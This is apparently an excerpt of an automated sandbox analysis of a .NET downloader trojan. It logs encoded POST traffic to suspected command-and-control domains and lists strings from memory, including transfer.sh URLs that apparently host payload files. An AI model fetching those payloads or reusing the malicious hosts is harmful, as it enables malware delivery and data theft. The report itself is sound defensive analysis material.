4b 69 41 56 62 67 65 52 4b 38 5f 51 42 4e 5f 48 4f 4b 6a 45 43 62 53 4e 78 68 65 67 6d 7a 79 6d 79 46 47 33 46 7e 53 39 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: -Zbh98=dGn-JNLb0DI1ScRUp7tbVGh-xGmrhQLI6WslwiRlqc7HG0gPqDYJa-sT61~4P_rBFJ(hfGiczcFpokkPqSW5W6y1XNEwa2RMlVG95NmwJ9nPgPcvVe~bYFX3udEEjh(5~S9h4tW-7KiAVbgeRK8_QBN_HOKjECbSNxhegmzymyFG3F~S9w).
      Source: global trafficHTTP traffic detected: POST /obc0/ HTTP/1.1Host: www.bloopacts.liveConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.bloopacts.liveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bloopacts.live/obc0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 2d 5a 62 68 39 38 3d 42 4f 78 4b 4e 41 70 66 67 58 74 43 4d 7a 76 30 74 30 67 41 54 48 39 4b 58 37 47 35 4f 63 4f 54 36 35 32 53 38 37 47 30 4e 69 72 52 67 70 48 5f 66 67 6a 2d 4a 4b 50 6f 55 6c 6a 61 74 34 74 50 31 45 4d 46 75 56 4d 54 61 66 57 6a 5a 46 43 79 50 6c 72 7a 55 4d 55 71 49 79 74 39 6e 42 58 55 28 6a 38 4b 44 53 6a 37 5a 39 63 4c 43 6a 63 69 44 36 33 73 47 70 7e 32 31 7a 5a 5a 63 56 46 34 48 34 48 4e 66 52 6c 63 4d 73 73 55 79 68 6f 55 36 67 65 6a 74 37 63 6a 6f 4b 6a 51 50 37 67 74 57 76 6d 4e 6f 49 49 55 7e 63 41 51 50 64 65 64 43 58 78 78 44 74 65 6b 33 51 6f 79 53 68 68 39 73 30 31 33 69 54 48 7a 6a 4a 7e 53 49 5a 62 53 44 59 54 69 67 73 57 67 7a 61 53 48 43 2d 68 47 49 30 63 34 35 79 47 5a 63 36 78 34 38 32 34 34 62 54 43 69 6f 54 56 4a 6a 59 6a 50 35 35 4e 38 52 57 57 70 46 41 4f 31 34 67 6e 50 64 48 62 63 39 57 43 58 4f 2d 34 54 41 79 72 77 47 30 72 49 69 64 28 31 45 75 4e 43 70 5f 53 51 4b 31 66 6f 6c 39 61 5a 4a 30 48 4e 75 4e 6d 64 56 54 63 68 73 62 73 4a 77 7a 6e 67 41 7a 50 62 75 74 50 61 56 38 54 4a 41 72 34 46 6a 79 4b 45 52 4a 46 74 6b 36 34 71 59 4a 69 62 50 43 63 6c 36 59 46 42 53 41 43 55 49 34 30 4b 72 4d 6b 61 77 42 4e 54 39 49 71 59 65 41 78 30 58 61 57 5f 73 54 78 58 65 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: -Zbh98=BOxKNApfgXtCMzv0t0gATH9KX7G5OcOT652S87G0NirRgpH_fgj-JKPoUljat4tP1EMFuVMTafWjZFCyPlrzUMUqIyt9nBXU(j8KDSj7Z9cLCjciD63sGp~21zZZcVF4H4HNfRlcMssUyhoU6gejt7cjoKjQP7gtWvmNoIIU~cAQPdedCXxxDtek3QoyShh9s013iTHzjJ~SIZbSDYTigsWgzaSHC-hGI0c45yGZc6x48244bTCioTVJjYjP55N8RWWpFAO14gnPdHbc9WCXO-4TAyrwG0rIid(1EuNCp_SQK1fol9aZJ0HNuNmdVTchsbsJwzngAzPbutPaV8TJAr4FjyKERJFtk64qYJibPCcl6YFBSACUI40KrMkawBNT9IqYeAx0XaW_sTxXew).
      Source: global trafficHTTP traffic detected: POST /obc0/ HTTP/1.1Host: www.bloopacts.liveConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.bloopacts.liveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bloopacts.live/obc0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 2d 5a 62 68 39 38 3d 42 4f 78 4b 4e 41 70 66 67 58 74 43 4e 43 76 30 73 6e 59 41 62 6e 39 4b 56 37 47 33 4f 63 4f 75 36 35 32 57 38 36 7a 5f 4e 52 37 52 67 35 33 5f 66 54 4c 2d 49 4b 50 72 61 46 6a 65 67 59 74 61 31 45 4e 6b 75 58 59 54 61 66 43 6a 5a 48 61 79 50 57 44 30 56 4d 55 6f 4b 79 74 79 6a 42 58 42 28 6a 52 44 44 51 6e 37 5a 5f 55 4c 43 51 6b 69 44 6f 66 76 42 4a 7e 4e 70 6a 5a 65 46 46 46 38 48 34 48 6a 66 52 6b 35 4d 70 6f 55 79 56 45 55 31 6c 43 67 6a 37 63 6d 72 4b 69 38 50 6f 35 70 59 39 76 43 70 72 4e 39 7e 73 68 38 4d 63 6e 71 59 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: -Zbh98=BOxKNApfgXtCNCv0snYAbn9KV7G3OcOu652W86z_NR7Rg53_fTL-IKPraFjegYta1ENkuXYTafCjZHayPWD0VMUoKytyjBXB(jRDDQn7Z_ULCQkiDofvBJ~NpjZeFFF8H4HjfRk5MpoUyVEU1lCgj7cmrKi8Po5pY9vCprN9~sh8McnqYw).
      Source: global trafficHTTP traffic detected: POST /obc0/ HTTP/1.1Host: www.skyepattest.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.skyepattest.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.skyepattest.com/obc0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 2d 5a 62 68 39 38 3d 32 4e 36 6e 38 5f 43 6b 75 48 53 35 63 64 6f 69 41 70 32 2d 42 32 28 50 39 63 36 58 79 69 49 52 71 56 76 76 45 31 68 74 76 51 53 52 32 2d 71 45 54 51 6a 68 32 6e 28 30 64 62 6c 64 28 77 67 6a 6f 6c 37 56 63 54 68 59 77 30 79 47 6f 31 35 79 79 43 35 39 62 54 72 38 66 39 31 58 59 51 58 72 5a 46 59 65 5a 78 52 65 32 4f 66 52 6f 55 49 31 4e 33 6a 66 67 4f 61 72 48 33 79 67 33 35 4e 59 42 6d 6c 59 6a 5f 5a 6b 50 49 68 51 31 5f 5a 41 68 34 74 4c 30 34 4e 6d 7a 55 57 64 51 52 54 31 52 4a 4a 38 48 70 62 45 79 45 30 70 66 49 50 45 64 45 4f 74 37 65 73 68 72 6c 58 57 42 6a 7e 4c 64 65 4c 50 5a 59 33 58 4b 6f 51 76 73 54 45 6c 66 69 52 39 6c 62 50 46 54 6b 79 69 28 31 55 35 75 35 4d 5f 73 53 4c 4a 71 6a 73 57 46 62 38 6a 49 41 34 69 77 4a 65 4c 75 57 58 38 61 5f 49 4c 4a 66 65 74 37 34 78 53 35 66 4b 6c 50 76 49 79 31 69 42 4f 69 79 4b 51 4d 76 43 42 6c 42 69 50 59 7a 6f 74 76 33 56 41 6e 37 35 32 44 73 52 58 75 6f 4c 76 61 38 48 49 53 61 6f 68 67 42 39 31 70 70 46 5a 35 6b 55 6c 56 4f 6f 6e 58 35 72 78 6c 55 50 33 62 47 71 55 63 52 49 4e 4f 4a 73 59 70 33 58 74 65 65 37 63 44 39 61 74 48 48 41 41 38 4d 57 34 4b 51 66 71 50 68 41 33 39 75 6a 77 61 63 42 42 4c 72 44 63 79 69 43 4b 47 72 62 62 54 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: -Zbh98=2N6n8_CkuHS5cdoiAp2-B2(P9c6XyiIRqVvvE1htvQSR2-qETQjh2n(0dbld(wgjol7VcThYw0yGo15yyC59bTr8f91XYQXrZFYeZxRe2OfRoUI1N3jfgOarH3yg35NYBmlYj_ZkPIhQ1_ZAh4tL04NmzUWdQRT1RJJ8HpbEyE0pfIPEdEOt7eshrlXWBj~LdeLPZY3XKoQvsTElfiR9lbPFTkyi(1U5u5M_sSLJqjsWFb8jIA4iwJeLuWX8a_ILJfet74xS5fKlPvIy1iBOiyKQMvCBlBiPYzotv3VAn752DsRXuoLva8HISaohgB91ppFZ5kUlVOonX5rxlUP3bGqUcRINOJsYp3Xtee7cD9atHHAA8MW4KQfqPhA39ujwacBBLrDcyiCKGrbbTg).
      Source: global trafficHTTP traffic detected: POST /obc0/ HTTP/1.1Host: www.skyepattest.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.skyepattest.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.skyepattest.com/obc0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 2d 5a 62 68 39 38 3d 32 4e 36 6e 38 5f 43 6b 75 48 53 35 64 75 51 69 42 71 65 2d 4b 57 28 50 69 73 36 56 79 69 49 53 71 56 76 72 45 77 41 71 75 6a 79 52 32 76 61 45 54 69 37 68 78 6e 28 33 57 37 6c 52 69 67 67 32 6f 6c 36 47 63 53 4e 59 77 33 4f 47 6f 31 4a 79 7a 7a 35 36 59 54 72 79 5a 39 31 49 63 51 58 2d 5a 46 46 5a 5a 30 68 65 32 4c 62 52 70 6a 38 31 4e 46 62 41 78 2d 61 71 4b 6e 79 5a 35 5a 4e 69 42 6d 6c 48 6a 5f 5a 4f 50 4b 70 51 31 50 4a 41 69 62 46 4d 39 34 4e 76 76 6b 58 5a 59 45 6d 71 55 63 73 7a 58 34 72 49 78 68 4a 6a 55 70 4b 34 42 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: -Zbh98=2N6n8_CkuHS5duQiBqe-KW(Pis6VyiISqVvrEwAqujyR2vaETi7hxn(3W7lRigg2ol6GcSNYw3OGo1Jyzz56YTryZ91IcQX-ZFFZZ0he2LbRpj81NFbAx-aqKnyZ5ZNiBmlHj_ZOPKpQ1PJAibFM94NvvkXZYEmqUcszX4rIxhJjUpK4Bg).
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
      Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
      Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Oct 2022 03:56:52 GMTServer: ApacheContent-Length: 4406Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 11 Oct 2022 03:57:13 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 11 Oct 2022 03:57:15 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 11 Oct 2022 03:57:17 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
      Source: wlanext.exe, 00000003.00000002.573349924.0000000003436000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://fonts.googleapis.com/css?family=Open
      Source: wlanext.exe, 00000003.00000002.573349924.0000000003436000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://justinmezzell.com
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeString found in binary or memory: http://ocsp.digicert.com0A
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeString found in binary or memory: http://ocsp.digicert.com0C
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeString found in binary or memory: http://ocsp.digicert.com0N
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeString found in binary or memory: http://ocsp.digicert.com0X
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe, 00000000.00000002.314456233.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe, 00000000.00000002.314750292.000000000257D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://transfer.sh
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeString found in binary or memory: http://www.digicert.com/CPS0
      Source: wlanext.exe, 00000003.00000002.573349924.0000000003436000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.dzyngiri.com
      Source: d01F736L.3.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
      Source: d01F736L.3.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
      Source: wlanext.exe, 00000003.00000002.573387569.00000000035C8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cs.deviceatlas-cdn.com
      Source: wlanext.exe, 00000003.00000002.573939449.0000000005610000.00000004.00000800.00020000.00000000.sdmp, wlanext.exe, 00000003.00000002.573387569.00000000035C8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cs.deviceatlas-cdn.com/101dacs.js
      Source: wlanext.exe, 00000003.00000002.573939449.0000000005610000.00000004.00000800.00020000.00000000.sdmp, wlanext.exe, 00000003.00000002.573387569.00000000035C8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cs.deviceatlas-cdn.com/smartclick
      Source: d01F736L.3.drString found in binary or memory: https://duckduckgo.com/ac/?q=
      Source: d01F736L.3.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
      Source: d01F736L.3.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
      Source: wlanext.exe, 00000003.00000002.573939449.0000000005610000.00000004.00000800.00020000.00000000.sdmp, wlanext.exe, 00000003.00000002.573387569.00000000035C8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://my.101domain.com?utm_campaign=parked-page&utm_medium=referral&utm_source=augusta.broker&utm_
      Source: wlanext.exe, 00000003.00000002.573387569.00000000035C8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net
      Source: wlanext.exe, 00000003.00000002.573939449.0000000005610000.00000004.00000800.00020000.00000000.sdmp, wlanext.exe, 00000003.00000002.573387569.00000000035C8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net/css/vendor-1.css?20220908035046
      Source: d01F736L.3.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
      Source: wlanext.exe, 00000003.00000002.572056583.0000000000858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/search
      Source: wlanext.exe, 00000003.00000002.572056583.0000000000858000.00000004.00000020.00020000.00000000.sdmp, d01F736L.3.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
      Source: d01F736L.3.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
      Source: d01F736L.3.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
      Source: wlanext.exe, 00000003.00000002.572056583.0000000000858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=main
      Source: wlanext.exe, 00000003.00000002.572056583.0000000000858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=main_sfpf
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe, 00000000.00000002.314456233.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe, 00000000.00000002.314430217.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe, 00000000.00000002.314456233.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/get/NNwCGT/DLL.txt
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe, 00000000.00000002.314406799.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe, 00000000.00000002.314430217.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe, 00000000.00000002.314456233.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/get/at0HRq/COOL2.txt
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe, 00000000.00000002.314742227.0000000002574000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh4
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exe, 00000000.00000002.314896273.0000000002620000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://transfer.shD8
      Source: wlanext.exe, 00000003.00000002.573939449.0000000005610000.00000004.00000800.00020000.00000000.sdmp, wlanext.exe, 00000003.00000002.573387569.00000000035C8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.101domain.com/brand_services.htm?utm_campaign=parked-page&utm_medium=referral&utm_source
      Source: wlanext.exe, 00000003.00000002.573939449.0000000005610000.00000004.00000800.00020000.00000000.sdmp, wlanext.exe, 00000003.00000002.573387569.00000000035C8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.101domain.com/country_domain.htm?utm_campaign=parked-page&utm_medium=referral&utm_source
      Source: wlanext.exe, 00000003.00000002.573939449.0000000005610000.00000004.00000800.00020000.00000000.sdmp, wlanext.exe, 00000003.00000002.573387569.00000000035C8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.101domain.com/domain-availability-search.htm?utm_campaign=parked-page&utm_medium=referra
      Source: wlanext.exe, 00000003.00000002.573939449.0000000005610000.00000004.00000800.00020000.00000000.sdmp, wlanext.exe, 00000003.00000002.573387569.00000000035C8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.101domain.com/domain-registration.htm?utm_campaign=parked-page&utm_medium=referral&utm_s
      Source: wlanext.exe, 00000003.00000002.573939449.0000000005610000.00000004.00000800.00020000.00000000.sdmp, wlanext.exe, 00000003.00000002.573387569.00000000035C8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.101domain.com/domain_concierge_service.htm?query=augusta.broker&utm_campaign=parked-page
      Source: wlanext.exe, 00000003.00000002.573939449.0000000005610000.00000004.00000800.00020000.00000000.sdmp, wlanext.exe, 00000003.00000002.573387569.00000000035C8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.101domain.com/domain_monitoring_trademark_enforcement_guide.htm
      Source: wlanext.exe, 00000003.00000002.573939449.0000000005610000.00000004.00000800.00020000.00000000.sdmp, wlanext.exe, 00000003.00000002.573387569.00000000035C8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.101domain.com/external_links.htm
      Source: wlanext.exe, 00000003.00000002.573939449.0000000005610000.00000004.00000800.00020000.00000000.sdmp, wlanext.exe, 00000003.00000002.573387569.00000000035C8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.101domain.com/gmail_email_aliases.htm
      Source: wlanext.exe, 00000003.00000002.573939449.0000000005610000.00000004.00000800.00020000.00000000.sdmp, wlanext.exe, 00000003.00000002.573387569.00000000035C8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.101domain.com/google_workspace.htm?utm_campaign=parked-page&utm_medium=referral&utm_sour
      Source: wlanext.exe, 00000003.00000002.573939449.0000000005610000.00000004.00000800.00020000.00000000.sdmp, wlanext.exe, 00000003.00000002.573387569.00000000035C8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.101domain.com/new_gtld_extensions.htm?utm_campaign=parked-page&utm_medium=referral&utm_s
      Source: wlanext.exe, 00000003.00000002.573939449.0000000005610000.00000004.00000800.00020000.00000000.sdmp, wlanext.exe, 00000003.00000002.573387569.00000000035C8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.101domain.com/resource_center.htm
      Source: wlanext.exe, 00000003.00000002.573939449.0000000005610000.00000004.00000800.00020000.00000000.sdmp, wlanext.exe, 00000003.00000002.573387569.00000000035C8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.101domain.com/web_hosting.htm?utm_campaign=parked-page&utm_medium=referral&utm_source=au
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeString found in binary or memory: https://www.bandicam.com0
      Source: SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeString found in binary or memory: https://www.digicert.com/CPS0
